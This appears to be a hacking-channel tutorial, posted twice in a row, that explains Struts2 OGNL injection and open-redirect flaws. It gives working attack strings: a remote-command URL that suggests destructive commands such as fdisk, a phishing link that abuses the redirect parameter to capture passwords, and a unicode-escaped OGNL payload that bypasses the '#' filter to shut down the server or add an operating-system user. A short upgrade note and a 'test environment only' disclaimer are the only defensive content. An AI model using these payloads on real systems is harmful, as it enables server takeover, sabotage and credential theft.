▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Struts2 security vulnerability analysis by undercode :
1) remotely execute script code server
user can construct http:? //Host/struts2-blank/example/X.action action :%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} link, command goes here can be replaced It is the purpose of destroying the path and parameters of the script, such as fdisk -f, etc., so that the system cannot run.
2) Redirection vulnerabilities
users can construct a redirection connection like Taobao, a well-known website, in the form of <a href="http://www.淘宝.com/item00001.html?redirect:http://hacker/getyourPassword">discount new styles< /a>, guide the user to click to enter the phishing website, and log in on the interface to obtain the user's password.
3) Impact:
Apple, China Mobile, China Unicom, Baidu, Tencent, Taobao, JD.com, Sohu, Minsheng Bank and other large-scale corporate websites have all been poisoned, and the operation and maintenance engineers are miserable.
🦑Countermeasures: The
Apache team urgently released the Struts 2.3.15.1 security update version, which can be upgraded to this version to solve the above problems.
Struts2 vulnerability attack methods and solutions
1) Principle
The core of Struts2 is the webwork framework used. When processing the action, the http parameters are processed by calling the underlying getter/setter method. It declares each http parameter as an ONGL (here is ONGL Introduction) statement. When we submit an http parameter:
?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL converts it to:
//code @Undercoder
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed through the ParametersInterceptor (parameter filter), calling ValueStack.setValue() with the HTTP parameters provided by the user.
2) In order to prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in the parameter name, but if the Java unicode string is used to represent \u0023, the attacker can bypass the protection and modify the value executed by the Java method:
The code here is destructive, please execute it in a test environment, and it is strictly forbidden to use this method for malicious attacks
//code @Undercoder
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew% 20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
After escaping, it
looks like this: ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new %20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')( #rt=@java.lang.Runtime@getRuntime()))=1
The final result of OGNL processing is
java.lang.Runtime.getRuntime().exit(1); //Close the program, that is, close the web program
🦑Similar can be executed
java.lang.Runtime.getRuntime().exec("net user username and password/add");//Increase the operating system user, it can be successful if there is permission (replace %20 in the URL Space, %2F replace /)
As long as you have permission, you can execute any DOS command.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Struts2 security vulnerability analysis by undercode :
1) remotely execute script code server
user can construct http:? //Host/struts2-blank/example/X.action action :%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} link, command goes here can be replaced It is the purpose of destroying the path and parameters of the script, such as fdisk -f, etc., so that the system cannot run.
2) Redirection vulnerabilities
users can construct a redirection connection like Taobao, a well-known website, in the form of <a href="http://www.淘宝.com/item00001.html?redirect:http://hacker/getyourPassword">discount new styles< /a>, guide the user to click to enter the phishing website, and log in on the interface to obtain the user's password.
3) Impact:
Apple, China Mobile, China Unicom, Baidu, Tencent, Taobao, JD.com, Sohu, Minsheng Bank and other large-scale corporate websites have all been poisoned, and the operation and maintenance engineers are miserable.
🦑Countermeasures: The
Apache team urgently released the Struts 2.3.15.1 security update version, which can be upgraded to this version to solve the above problems.
Struts2 vulnerability attack methods and solutions
1) Principle
The core of Struts2 is the webwork framework used. When processing the action, the http parameters are processed by calling the underlying getter/setter method. It declares each http parameter as an ONGL (here is ONGL Introduction) statement. When we submit an http parameter:
?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL converts it to:
//code @Undercoder
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed through the ParametersInterceptor (parameter filter), calling ValueStack.setValue() with the HTTP parameters provided by the user.
2) In order to prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in the parameter name, but if the Java unicode string is used to represent \u0023, the attacker can bypass the protection and modify the value executed by the Java method:
The code here is destructive, please execute it in a test environment, and it is strictly forbidden to use this method for malicious attacks
//code @Undercoder
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew% 20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
After escaping, it
looks like this: ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new %20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')( #rt=@java.lang.Runtime@getRuntime()))=1
The final result of OGNL processing is
java.lang.Runtime.getRuntime().exit(1); //Close the program, that is, close the web program
🦑Similar can be executed
java.lang.Runtime.getRuntime().exec("net user username and password/add");//Increase the operating system user, it can be successful if there is permission (replace %20 in the URL Space, %2F replace /)
As long as you have permission, you can execute any DOS command.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁